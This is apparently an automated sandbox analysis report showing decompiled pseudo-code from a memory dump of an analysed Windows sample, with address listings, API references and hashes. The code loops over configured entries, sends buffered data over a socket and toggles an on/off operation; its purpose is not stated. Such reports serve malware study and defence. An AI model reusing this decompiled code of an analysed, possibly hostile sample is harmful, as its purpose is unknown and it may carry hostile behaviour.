															__eflags = _t519;
															 *( *(_t661 + 8) + 8) = _t519;
														}
														Sleep(0x3e8);
													}
													_t499 =  *(_t661 - 0x1c) + 1;
													__eflags = _t499;
													 *(_t661 - 0x1c) = _t499;
												}
												__eflags =  *(_t661 - 0x18);
												if( *(_t661 - 0x18) > 0) {
													E00A457D0( *(_t661 - 0x18),  *(_t661 - 4), _t661 - 0xc8,  *(_t661 - 0x18),  *(_t661 + 8));
													 *(_t661 - 0x18) = 0;
													_t499 = _t661 - 0xc8;
													E00A42540(_t661 - 0xc8, 0x80);
												}
												L74:
												__eflags =  *(_t661 + 8);
												if( *(_t661 + 8) == 0) {
													L78:
													__eflags =  *(_t661 + 8);
													if( *(_t661 + 8) != 0) {
														_t585 =  *(_t661 + 8);
														__eflags =  *(_t585 + 0x10d60);
														if( *(_t585 + 0x10d60) > 0) {
															E00A439C0(E00A436C0(_t499));
															_push(0x68b3);
															E00A43830(__eflags, E00A436C0(_t369), " %s M%X \n",  *(_t661 + 8) + 0x1001d);
															_t663 = _t663 + 0x10;
															_t586 =  *( *(_t661 + 8) + 0x10d60) * 0x3e8;
															__eflags = _t586;
															Sleep(_t586);
														}
													}
													L81:
													break;
												}
												_t587 =  *(_t661 + 8);
												__eflags =  *((intOrPtr*)(_t587 + 0x10d68)) - 0xffffffff;
												if( *((intOrPtr*)(_t587 + 0x10d68)) == 0xffffffff) {
													goto L78;
												}
												_t375 =  *(_t661 + 8);
												_t499 =  *(_t661 - 0x20);
												__eflags =  *(_t661 - 0x20) -  *((intOrPtr*)(_t375 + 0x10d68));
												if( *(_t661 - 0x20) !=  *((intOrPtr*)(_t375 + 0x10d68))) {
													goto L78;
												}
												E00A439C0(E00A436C0(_t499));
												_push(0x68b2);
												E00A43830(__eflags, E00A436C0(_t376), " %s M%X \n",  *(_t661 + 8) + 0x1001d);
												_t663 = _t663 + 0x10;
												Sleep( *( *(_t661 + 8) + 0x10d64) * 0x3e8);
												goto L81;
											}
											 *(_t661 - 0xc) = 0;
											while(1) {
												_t605 =  *(_t661 + 8);
												__eflags =  *(_t661 - 0xc) -  *((intOrPtr*)(_t605 + 0x1014c));
												if( *(_t661 - 0xc) >=  *((intOrPtr*)(_t605 + 0x1014c))) {
													break;
												}
												_t543 =  *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0xc) * 4));
												__eflags =  *((intOrPtr*)(_t543 + 0xc)) -  *(_t661 - 0x14);
												if( *((intOrPtr*)(_t543 + 0xc)) ==  *(_t661 - 0x14)) {
													_t443 =  *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0xc) * 4));
													__eflags =  *(_t443 + 8) & 0x000000ff;
													if(( *(_t443 + 8) & 0x000000ff) != 0) {
														 *(_t661 - 8) = E00A465E0( *(_t661 - 4), 6, 0,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0xc) * 4)))), 1,  *(_t661 + 8),  *( *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0xc) * 4)) + 4) & 0x000000ff,  *( *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0xc) * 4)) + 9) & 0x000000ff);
													}
													_t499 =  *(_t661 + 8);
													__eflags = ( *(_t499 + 0x10018) & 0x000000ff) - 1;
													if(( *(_t499 + 0x10018) & 0x000000ff) != 1) {
														_t499 =  *(_t661 - 4);
														 *(_t661 - 8) = E00A465E0( *(_t661 - 4), 6, 0,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0xc) * 4)))), 0,  *(_t661 + 8),  *( *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0xc) * 4)) + 4) & 0x000000ff,  *( *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0xc) * 4)) + 9) & 0x000000ff);
														_t639 =  *(_t661 + 8);
														__eflags = ( *(_t639 + 0x10018) & 0x000000ff) - 1;
														if(( *(_t639 + 0x10018) & 0x000000ff) != 1) {
															_t552 =  *(_t661 - 8) & 0x00000040;
															__eflags =  *(_t661 - 8) & 0x00000040;
															if(( *(_t661 - 8) & 0x00000040) == 0) {
																E00A439C0(E00A436C0(_t552));
																_push( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0xc) * 4)))));
																_push(0x68b1);
																__eflags =  *(_t661 + 8) + 0x1001d;
																E00A43830(__eflags, E00A436C0( *(_t661 + 8) + 0x1001d), " %s M%X %d\n",  *(_t661 + 8) + 0x1001d);
																_t663 = _t663 + 0x14;
															}
															L27:
															_t499 =  *(_t661 - 0xc) + 1;
															__eflags = _t499;
															 *(_t661 - 0xc) = _t499;
															continue;
														}
													} else {
													}
													break;
												}
												goto L27;
											}
											_t606 =  *(_t661 + 8);
											__eflags =  *(_t606 + 0x10046) & 0x000000ff;
											if(( *(_t606 + 0x10046) & 0x000000ff) == 0) {
												L61:
												goto L74;
											}
											Sleep(0x3e8);
											 *(_t661 - 0x20) = 0xffffffff;
											_t521 =  *(_t661 + 8);
											__eflags =  *(_t521 + 0x10045) & 0x000000ff;
											if(( *(_t521 + 0x10045) & 0x000000ff) != 0) {
												 *(_t661 - 0x30) = 0;
											} else {
												 *(_t661 - 0x30) = 1;
											}
											 *((char*)( *(_t661 + 8) + 0x10045)) =  *(_t661 - 0x30);
											E00A439C0(E00A436C0( *(_t661 - 0x30)));
											_push(0x68b3);
											E00A43830(__eflags, E00A436C0(_t405), " %s M%X \n",  *(_t661 + 8) + 0x1001d);
											_t666 = _t663 + 0x10;
											_t409 =  *(_t661 + 8);
											_t524 =  *(_t409 + 0x10045) & 0x000000ff;
											__eflags =  *(_t409 + 0x10045) & 0x000000ff;
											if(( *(_t409 + 0x10045) & 0x000000ff) == 0) {
												 *(_t661 - 0x34) = "OFF\n\n";
											} else {
												 *(_t661 - 0x34) = "ON\n\n";
											}
											E00A43830(__eflags, E00A436C0(_t524), "\nCurrent operation : %s",  *(_t661 - 0x34));
											_t663 = _t666 + 0xc;
											 *(_t661 - 0x10) = 0;
											while(1) {
												_t499 =  *(_t661 + 8);
												__eflags =  *(_t661 - 0x10) -  *((intOrPtr*)(_t499 + 0x1014c));
												if( *(_t661 - 0x10) >=  *((intOrPtr*)(_t499 + 0x1014c))) {
													goto L61;
												}
												_t413 =  *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0x10) * 4));
												__eflags =  *((intOrPtr*)(_t413 + 0xc)) -  *(_t661 - 0x14);
												if( *((intOrPtr*)(_t413 + 0xc)) ==  *(_t661 - 0x14)) {
													_t614 =  *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0x10) * 4));
													__eflags =  *(_t614 + 8) & 0x000000ff;
													if(( *(_t614 + 8) & 0x000000ff) != 0) {
														 *(_t661 - 8) = E00A465E0( *(_t661 - 4), 6, 0,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0x10) * 4)))), 1,  *(_t661 + 8),  *( *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0x10) * 4)) + 4) & 0x000000ff,  *( *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0x10) * 4)) + 9) & 0x000000ff);
													}
													_t416 =  *(_t661 + 8);
													_t499 =  *(_t416 + 0x10018) & 0x000000ff;
													__eflags = ( *(_t416 + 0x10018) & 0x000000ff) - 1;
													if(( *(_t416 + 0x10018) & 0x000000ff) != 1) {
														 *(_t661 - 8) = E00A465E0( *(_t661 - 4), 6, 0,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0x10) * 4)))), 0,  *(_t661 + 8),  *( *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0x10) * 4)) + 4) & 0x000000ff,  *( *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0x10) * 4)) + 9) & 0x000000ff);
														_t499 =  *(_t661 + 8);
														__eflags = ( *(_t499 + 0x10018) & 0x000000ff) - 1;
														if(( *(_t499 + 0x10018) & 0x000000ff) != 1) {
															__eflags =  *(_t661 - 8) & 0x00000040;
															if(( *(_t661 - 8) & 0x00000040) == 0) {
																E00A439C0(E00A436C0(_t499));
																_push( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0x10) * 4)))));
																_push(0x68b1);
																__eflags =  *(_t661 + 8) + 0x1001d;
																E00A43830(__eflags, E00A436C0( *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0x10) * 4))), " %s M%X %d\n",  *(_t661 + 8) + 0x1001d);
																_t663 = _t663 + 0x14;
															}
															L48:
															_t427 =  *(_t661 - 0x10) + 1;
															__eflags = _t427;
															 *(_t661 - 0x10) = _t427;
															continue;
														}
													} else {
													}
													goto L61;
												}
												goto L48;
											}
											goto L61;
										}
										_t649 =  *(_t661 - 0x14) + 1;
										__eflags = _t649;
										 *(_t661 - 0x14) = _t649;
									}
									_t355 =  *(_t661 + 8);
									__eflags =  *(_t355 + 0x10046) & 0x000000ff;
									if(( *(_t355 + 0x10046) & 0x000000ff) != 0) {
										_t576 =  *(_t661 + 8);
										__eflags =  *(_t661 - 0x20) -  *((intOrPtr*)(_t576 + 0x10d58));
										if( *(_t661 - 0x20) >=  *((intOrPtr*)(_t576 + 0x10d58))) {
											 *(_t661 - 0x20) = 0xffffffff;
											_t495 =  *(_t661 + 8);
											__eflags =  *(_t495 + 0x10045) & 0x000000ff;
											if(( *(_t495 + 0x10045) & 0x000000ff) != 0) {
												 *(_t661 - 0x38) = 0;
											} else {
												 *(_t661 - 0x38) = 1;
											}
											 *((char*)( *(_t661 + 8) + 0x10045)) =  *(_t661 - 0x38);
											E00A439C0(E00A436C0( *(_t661 - 0x38)));
											_push(0x68b3);
											E00A43830(__eflags, E00A436C0(_t358), " %s M%X \n",  *(_t661 + 8) + 0x1001d);
											_t665 = _t663 + 0x10;
											_t362 =  *(_t661 + 8);
											_t498 =  *(_t362 + 0x10045) & 0x000000ff;
											__eflags =  *(_t362 + 0x10045) & 0x000000ff;
											if(( *(_t362 + 0x10045) & 0x000000ff) == 0) {
												 *(_t661 - 0x3c) = "OFF\n\n";
											} else {
												 *(_t661 - 0x3c) = "ON\n\n";
											}
											E00A43830(__eflags, E00A436C0(_t498), "\nCurrent operation : %s",  *(_t661 - 0x3c));
											_t663 = _t665 + 0xc;
										}
									}
									Sleep(0x3e8);
									while(1) {
										L92:
										 *(_t661 - 8) = E00A46220( *(_t661 - 4),  *(_t661 + 8));
										 *( *(_t661 + 8) + 0x10018) = 1;
										if(( *( *(_t661 + 8) + 0x10018) & 0x000000ff) != 1) {
										}
										goto L1;
									}
								}
								 *((intOrPtr*)( *(_t661 + 8) + 0x10038)) = E00A46310( *(_t661 - 4),  *(_t661 + 8));
								_t651 =  *(_t661 + 8);
								__eflags =  *((intOrPtr*)(_t651 + 0x10038)) - 0xffffffff;
								if( *((intOrPtr*)(_t651 + 0x10038)) != 0xffffffff) {
									_push( *((intOrPtr*)( *(_t661 + 8) + 0x10038)));
									_push(0x68b4);
									E00A43830(__eflags, E00A436C0( *((intOrPtr*)( *(_t661 + 8) + 0x10038))), " %s ST%X %d\n",  *(_t661 + 8) + 0x1001d);
									_t663 = _t663 + 0x14;
								}
								goto L92;
							}
							_t472 =  *(_t661 + 8);
							__eflags =  *(_t472 + 0xc);
							if( *(_t472 + 0xc) != 0) {
								_t565 =  *(_t661 + 8);
								_t473 =  *(_t661 - 0x28);
								asm("cdq");
								__eflags = _t473 %  *(_t565 + 0xc);
								if(_t473 %  *(_t565 + 0xc) == 0) {
									_t475 =  *( *(_t661 + 8) + 0x10040) * 0x3e8;
									__eflags = _t475;
									Sleep(_t475);
								}
							}
							continue;
						}
						_t477 = E00A45650( *(_t661 + 8) + 0x1001d,  *((intOrPtr*)( *(_t661 + 8) + 0x10034))); // executed
						 *(_t661 - 4) = _t477;
						if( *(_t661 - 4) != 0xffffffff) {
							 *( *(_t661 + 8) + 0x10018) = 0;
							 *((char*)( *(_t661 + 8) + 0x1001b)) = 1;
							 *( *(_t661 + 8) + 4) = 0;
							 *( *(_t661 + 8) + 8) = 0;
							 *(_t661 - 8) = E00A46140( *(_t661 - 4),  *(_t661 + 8));
							 *(_t661 - 8) = E00A45F10( *(_t661 - 4),  *(_t661 + 8));
							goto L7;
						} else {
							 *( *(_t661 + 8) + 0x10018) = 1;
							 *((char*)( *(_t661 + 8) + 0x1001b)) = 0;
							break;
						}
					}
					__imp__#116(); // executed
					return 0;
				}
			}

0x00a4737b
0x00a4737b
0x00a47388
0x00a4738e
0x00a473a2
0x00a473a2
0x00a46b15
0x00a46b15
0x00a46b18
0x00a46b1e
0x00a46b27
0x00a46b30
0x00000000
0x00000000
0x00a46b3c
0x00a46b4c
0x00a46bd7
0x00a46bd7
0x00a46be1
0x00a46be4
0x00a46c16
0x00a46c19
0x00a46c20
0x00a46c8e
0x00a46c9f
0x00a46ca4
0x00a46cab
0x00a46caf
0x00a46cbc
0x00a46cb1
0x00a46cb7
0x00a46cb7
0x00a46cc6
0x00a46cd4
0x00a46cd4
0x00a46cda
0x00a46ce0
0x00000000
0x00000000
0x00a46ce9
0x00a46cef
0x00a46cf2
0x00a46cf9
0x00a46cfb
0x00a46d02
0x00a46d0c
0x00a46d0e
0x00a47095
0x00a470a7
0x00a470a7
0x00a470ad
0x00a470b3
0x00000000
0x00000000
0x00a470c5
0x00a470cb
0x00a470ce
0x00a470de
0x00a47137
0x00a4713a
0x00a4713e
0x00a47146
0x00a4714c
0x00a47161
0x00a47166
0x00a47179
0x00a47179
0x00a47194
0x00a47199
0x00a471a2
0x00a471ab
0x00a471ab
0x00a471b1
0x00a471b1
0x00a471b9
0x00a471b9
0x00a470a1
0x00a470a1
0x00a470a4
0x00a470a4
0x00a471c4
0x00a471c8
0x00a471dd
0x00a471e2
0x00a471ee
0x00a471f5
0x00a471f5
0x00a471fa
0x00a471fa
0x00a471fe
0x00a4725e
0x00a4725e
0x00a47262
0x00a47264
0x00a47267
0x00a4726e
0x00a47277
0x00a4727c
0x00a47295
0x00a4729a
0x00a472a0
0x00a472a0
0x00a472ab
0x00a472ab
0x00a4726e
0x00a472b1
0x00000000
0x00a472b1
0x00a47200
0x00a47203
0x00a4720a
0x00000000
0x00000000
0x00a4720c
0x00a4720f
0x00a47212
0x00a47218
0x00000000
0x00000000
0x00a47221
0x00a47226
0x00a47240
0x00a47245
0x00a47256
0x00000000
0x00a47256
0x00a46d14
0x00a46d26
0x00a46d26
0x00a46d2c
0x00a46d32
0x00000000
0x00000000
0x00a46d44
0x00a46d4a
0x00a46d4d
0x00a46d5d
0x00a46d64
0x00a46d66
0x00a46db5
0x00a46db5
0x00a46db8
0x00a46dc2
0x00a46dc5
0x00a46e10
0x00a46e19
0x00a46e1c
0x00a46e26
0x00a46e29
0x00a46e30
0x00a46e30
0x00a46e33
0x00a46e3c
0x00a46e52
0x00a46e53
0x00a46e5b
0x00a46e6d
0x00a46e72
0x00a46e72
0x00a46d1d
0x00a46d20
0x00a46d20
0x00a46d23
0x00000000
0x00a46d23
0x00000000
0x00a46dc7
0x00000000
0x00a46dc5
0x00000000
0x00a46d4f
0x00a46e7a
0x00a46e84
0x00a46e86
0x00a47090
0x00000000
0x00a47090
0x00a46e91
0x00a46e97
0x00a46e9e
0x00a46ea8
0x00a46eaa
0x00a46eb5
0x00a46eac
0x00a46eac
0x00a46eac
0x00a46ec2
0x00a46ecf
0x00a46ed4
0x00a46eee
0x00a46ef3
0x00a46ef6
0x00a46ef9
0x00a46f00
0x00a46f02
0x00a46f0d
0x00a46f04
0x00a46f04
0x00a46f04
0x00a46f23
0x00a46f28
0x00a46f2b
0x00a46f3d
0x00a46f3d
0x00a46f43
0x00a46f49
0x00000000
0x00000000
0x00a46f5b
0x00a46f61
0x00a46f64
0x00a46f74
0x00a46f7b
0x00a46f7d
0x00a46fcc
0x00a46fcc
0x00a46fcf
0x00a46fd2
0x00a46fd9
0x00a46fdc
0x00a47030
0x00a47033
0x00a4703d
0x00a47040
0x00a47047
0x00a4704a
0x00a47053
0x00a47069
0x00a4706a
0x00a47072
0x00a47083
0x00a47088
0x00a47088
0x00a46f34
0x00a46f37
0x00a46f37
0x00a46f3a
0x00000000
0x00a46f3a
0x00000000
0x00a46fde
0x00000000
0x00a46fdc
0x00000000
0x00a46f66
0x00000000
0x00a46f3d
0x00a46cce
0x00a46cce
0x00a46cd1
0x00a46cd1
0x00a472b8
0x00a472c2
0x00a472c4
0x00a472ca
0x00a472d0
0x00a472d6
0x00a472dc
0x00a472e3
0x00a472ed
0x00a472ef
0x00a472fa
0x00a472f1
0x00a472f1
0x00a472f1
0x00a47307
0x00a47314
0x00a47319
0x00a47333
0x00a47338
0x00a4733b
0x00a4733e
0x00a47345
0x00a47347
0x00a47352
0x00a47349
0x00a47349
0x00a47349
0x00a47368
0x00a4736d
0x00a4736d
0x00a472d6
0x00a47375
0x00a4737b
0x00a4737b
0x00a47388
0x00a4738e
0x00a473a2
0x00a473a2
0x00000000
0x00a473a2
0x00a4737b
0x00a46c32
0x00a46c38
0x00a46c3b
0x00a46c42
0x00a46c57
0x00a46c58
0x00a46c72
0x00a46c77
0x00a46c77
0x00000000
0x00a46c42
0x00a46be6
0x00a46be9
0x00a46bed
0x00a46bef
0x00a46bf2
0x00a46bf5
0x00a46bf9
0x00a46bfb
0x00a46c00
0x00a46c00
0x00a46c0b
0x00a46c0b
0x00a46bfb
0x00000000
0x00a46c11
0x00a46b66
0x00a46b6b
0x00a46b72
0x00a46b92
0x00a46b9c
0x00a46ba6
0x00a46bb0
0x00a46bc4
0x00a46bd4
0x00000000
0x00a46b74
0x00a46b77
0x00a46b81
0x00000000
0x00a46b81
0x00a46b72
0x00a473ae
0x00a473b9
0x00a473b9

APIs

Part of subcall function 00A46220: Sleep.KERNEL32(000003E8,00000000,00000000,?), ref: 00A46295

WSACleanup.WS2_32 ref: 00A473AE

Memory Dump Source

Source File: 00000000.00000002.273246346.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true

Associated: 00000000.00000002.273239754.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273265989.0000000000A49000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273273320.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_40_115.jbxd

Yara matches

Similarity

API ID: CleanupSleep
String ID:
API String ID: 1660135218-0
Opcode ID: 972d7f5147ff7f7ce21243d0f01df8bb55c8f5a4a90f6596a02269aef70f8752
Instruction ID: 1a67edb59592535c6970aa40913f1bf736d501c5ac8d3b8f40f4c109939175e1
Opcode Fuzzy Hash: 972d7f5147ff7f7ce21243d0f01df8bb55c8f5a4a90f6596a02269aef70f8752
Instruction Fuzzy Hash: AF213D74904148DFCB15CFA4C180AEDBBF1AF89314F2481A9E949AF341C371AE81EB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A46C49 Relevance: 1.6, APIs: 1, Instructions: 51
networkCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00A46C49() {
				signed int _t354;
				signed int _t355;
				signed int _t362;
				void* _t366;
				signed int _t375;
				signed int _t409;
				intOrPtr _t413;
				signed int _t416;
				long _t427;
				intOrPtr _t443;
				signed int _t472;
				signed int _t473;
				long _t475;
				signed int _t477;
				signed int _t489;
				signed int _t490;
				signed int _t495;
				intOrPtr _t506;
				long _t519;
				signed int _t521;
				intOrPtr _t543;
				signed int _t565;
				signed int _t576;
				void* _t583;
				signed int _t584;
				signed int _t585;
				long _t586;
				signed int _t587;
				signed int _t605;
				signed int _t606;
				intOrPtr _t614;
				signed int _t639;
				long _t649;
				signed int _t651;
				void* _t661;
				void* _t663;
				void* _t665;
				void* _t666;

				while(1) {
					L92:
					 *(_t661 - 8) = E00A46220( *(_t661 - 4),  *(_t661 + 8));
					 *( *(_t661 + 8) + 0x10018) = 1;
					if(( *( *(_t661 + 8) + 0x10018) & 0x000000ff) != 1) {
					}
					while(1) {
						L1:
						 *((intOrPtr*)(_t661 - 0x44)) =  *((intOrPtr*)(_t661 - 0x24));
						 *((intOrPtr*)(_t661 - 0x48)) =  *((intOrPtr*)(_t661 - 0x40));
						 *((intOrPtr*)(_t661 - 0x24)) =  *((intOrPtr*)(_t661 - 0x24)) + 1;
						if( *((intOrPtr*)(_t661 - 0x44)) >=  *((intOrPtr*)(_t661 - 0x48))) {
							break;
						}
						 *(_t661 - 0x28) =  *(_t661 - 0x28) + 1;
						if(( *( *(_t661 + 8) + 0x10018) & 0x000000ff) != 1) {
							L7:
							_t489 =  *(_t661 + 8);
							__eflags = ( *(_t489 + 0x10018) & 0x000000ff) - 1;
							if(( *(_t489 + 0x10018) & 0x000000ff) != 1) {
								_t490 =  *(_t661 + 8);
								__eflags =  *((intOrPtr*)(_t490 + 0x10038)) - 0xffffffff;
								if( *((intOrPtr*)(_t490 + 0x10038)) != 0xffffffff) {
									E00A46480( *(_t661 - 4),  *(_t661 + 8));
									E00A42540(_t661 - 0xc8, 0x80);
									 *(_t661 - 0x18) = 0;
									__eflags =  *(_t661 - 0x20) - 0xffffffff;
									if( *(_t661 - 0x20) <= 0xffffffff) {
										 *(_t661 - 0x2c) = 0;
									} else {
										 *(_t661 - 0x2c) =  *(_t661 - 0x20) + 1;
									}
									 *(_t661 - 0x14) =  *(_t661 - 0x2c);
									while(1) {
										_t354 =  *(_t661 + 8);
										__eflags =  *(_t661 - 0x14) -  *((intOrPtr*)(_t354 + 0x10d58));
										if( *(_t661 - 0x14) >  *((intOrPtr*)(_t354 + 0x10d58))) {
											break;
										}
										 *(_t661 - 0x20) =  *(_t661 - 0x14);
										_t366 =  *(_t661 + 8) +  *(_t661 - 0x14);
										_t499 =  *((char*)(_t366 + 0x10956));
										__eflags =  *((char*)(_t366 + 0x10956));
										if( *((char*)(_t366 + 0x10956)) != 0) {
											_t583 =  *(_t661 + 8) +  *(_t661 - 0x14);
											__eflags =  *((char*)(_t583 + 0x10556));
											if( *((char*)(_t583 + 0x10556)) != 0) {
												 *(_t661 - 0x1c) = 0;
												while(1) {
													_t584 =  *(_t661 + 8);
													__eflags =  *(_t661 - 0x1c) -  *((intOrPtr*)(_t584 + 0x1014c));
													if( *(_t661 - 0x1c) >=  *((intOrPtr*)(_t584 + 0x1014c))) {
														break;
													}
													_t506 =  *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0x1c) * 4));
													__eflags =  *((intOrPtr*)(_t506 + 0xc)) -  *(_t661 - 0x14);
													if( *((intOrPtr*)(_t506 + 0xc)) ==  *(_t661 - 0x14)) {
														E00A42540(_t661 - 0x1c8, 0x100);
														 *(_t661 - 8) = E00A46860( *(_t661 - 4), _t661 - 0x1c8, 6, 0,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0x1c) * 4)))), 0,  *(_t661 + 8),  *( *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0x1c) * 4)) + 4) & 0x000000ff,  *( *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0x1c) * 4)) + 9) & 0x000000ff);
														__eflags =  *(_t661 - 8);
														if( *(_t661 - 8) > 0) {
															__eflags =  *(_t661 - 0x18) +  *(_t661 - 8) - 0x80;
															if( *(_t661 - 0x18) +  *(_t661 - 8) >= 0x80) {
																E00A457D0(_t661 - 0xc8,  *(_t661 - 4), _t661 - 0xc8,  *(_t661 - 0x18),  *(_t661 + 8));
																 *(_t661 - 0x18) = 0;
																E00A42540(_t661 - 0xc8, 0x80);
															}
															E00A42190(_t661 +  *(_t661 - 0x18) - 0xc8, _t661 - 0x1c8,  *(_t661 - 8));
															_t663 = _t663 + 0xc;
															 *(_t661 - 0x18) =  *(_t661 - 0x18) +  *(_t661 - 8);
															_t519 =  *( *(_t661 + 8) + 8) + 1;
															__eflags = _t519;
															 *( *(_t661 + 8) + 8) = _t519;
														}
														Sleep(0x3e8);
													}
													_t499 =  *(_t661 - 0x1c) + 1;
													__eflags = _t499;
													 *(_t661 - 0x1c) = _t499;
												}
												__eflags =  *(_t661 - 0x18);
												if( *(_t661 - 0x18) > 0) {
													E00A457D0( *(_t661 - 0x18),  *(_t661 - 4), _t661 - 0xc8,  *(_t661 - 0x18),  *(_t661 + 8));
													 *(_t661 - 0x18) = 0;
													_t499 = _t661 - 0xc8;
													E00A42540(_t661 - 0xc8, 0x80);
												}
												L74:
												__eflags =  *(_t661 + 8);
												if( *(_t661 + 8) == 0) {
													L78:
													__eflags =  *(_t661 + 8);
													if( *(_t661 + 8) != 0) {
														_t585 =  *(_t661 + 8);
														__eflags =  *(_t585 + 0x10d60);
														if( *(_t585 + 0x10d60) > 0) {
															E00A439C0(E00A436C0(_t499));
															_push(0x68b3);
															E00A43830(__eflags, E00A436C0(_t369), " %s M%X \n",  *(_t661 + 8) + 0x1001d);
															_t663 = _t663 + 0x10;
															_t586 =  *( *(_t661 + 8) + 0x10d60) * 0x3e8;
															__eflags = _t586;
															Sleep(_t586);
														}
													}
													L81:
													break;
												}
												_t587 =  *(_t661 + 8);
												__eflags =  *((intOrPtr*)(_t587 + 0x10d68)) - 0xffffffff;
												if( *((intOrPtr*)(_t587 + 0x10d68)) == 0xffffffff) {
													goto L78;
												}
												_t375 =  *(_t661 + 8);
												_t499 =  *(_t661 - 0x20);
												__eflags =  *(_t661 - 0x20) -  *((intOrPtr*)(_t375 + 0x10d68));
												if( *(_t661 - 0x20) !=  *((intOrPtr*)(_t375 + 0x10d68))) {
													goto L78;
												}
												E00A439C0(E00A436C0(_t499));
												_push(0x68b2);
												E00A43830(__eflags, E00A436C0(_t376), " %s M%X \n",  *(_t661 + 8) + 0x1001d);
												_t663 = _t663 + 0x10;
												Sleep( *( *(_t661 + 8) + 0x10d64) * 0x3e8);
												goto L81;
											}
											 *(_t661 - 0xc) = 0;
											while(1) {
												_t605 =  *(_t661 + 8);
												__eflags =  *(_t661 - 0xc) -  *((intOrPtr*)(_t605 + 0x1014c));
												if( *(_t661 - 0xc) >=  *((intOrPtr*)(_t605 + 0x1014c))) {
													break;
												}
												_t543 =  *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0xc) * 4));
												__eflags =  *((intOrPtr*)(_t543 + 0xc)) -  *(_t661 - 0x14);
												if( *((intOrPtr*)(_t543 + 0xc)) ==  *(_t661 - 0x14)) {
													_t443 =  *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0xc) * 4));
													__eflags =  *(_t443 + 8) & 0x000000ff;
													if(( *(_t443 + 8) & 0x000000ff) != 0) {
														 *(_t661 - 8) = E00A465E0( *(_t661 - 4), 6, 0,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0xc) * 4)))), 1,  *(_t661 + 8),  *( *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0xc) * 4)) + 4) & 0x000000ff,  *( *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0xc) * 4)) + 9) & 0x000000ff);
													}
													_t499 =  *(_t661 + 8);
													__eflags = ( *(_t499 + 0x10018) & 0x000000ff) - 1;
													if(( *(_t499 + 0x10018) & 0x000000ff) != 1) {
														_t499 =  *(_t661 - 4);
														 *(_t661 - 8) = E00A465E0( *(_t661 - 4), 6, 0,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0xc) * 4)))), 0,  *(_t661 + 8),  *( *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0xc) * 4)) + 4) & 0x000000ff,  *( *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0xc) * 4)) + 9) & 0x000000ff);
														_t639 =  *(_t661 + 8);
														__eflags = ( *(_t639 + 0x10018) & 0x000000ff) - 1;
														if(( *(_t639 + 0x10018) & 0x000000ff) != 1) {
															_t552 =  *(_t661 - 8) & 0x00000040;
															__eflags =  *(_t661 - 8) & 0x00000040;
															if(( *(_t661 - 8) & 0x00000040) == 0) {
																E00A439C0(E00A436C0(_t552));
																_push( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0xc) * 4)))));
																_push(0x68b1);
																__eflags =  *(_t661 + 8) + 0x1001d;
																E00A43830(__eflags, E00A436C0( *(_t661 + 8) + 0x1001d), " %s M%X %d\n",  *(_t661 + 8) + 0x1001d);
																_t663 = _t663 + 0x14;
															}
															L27:
															_t499 =  *(_t661 - 0xc) + 1;
															__eflags = _t499;
															 *(_t661 - 0xc) = _t499;
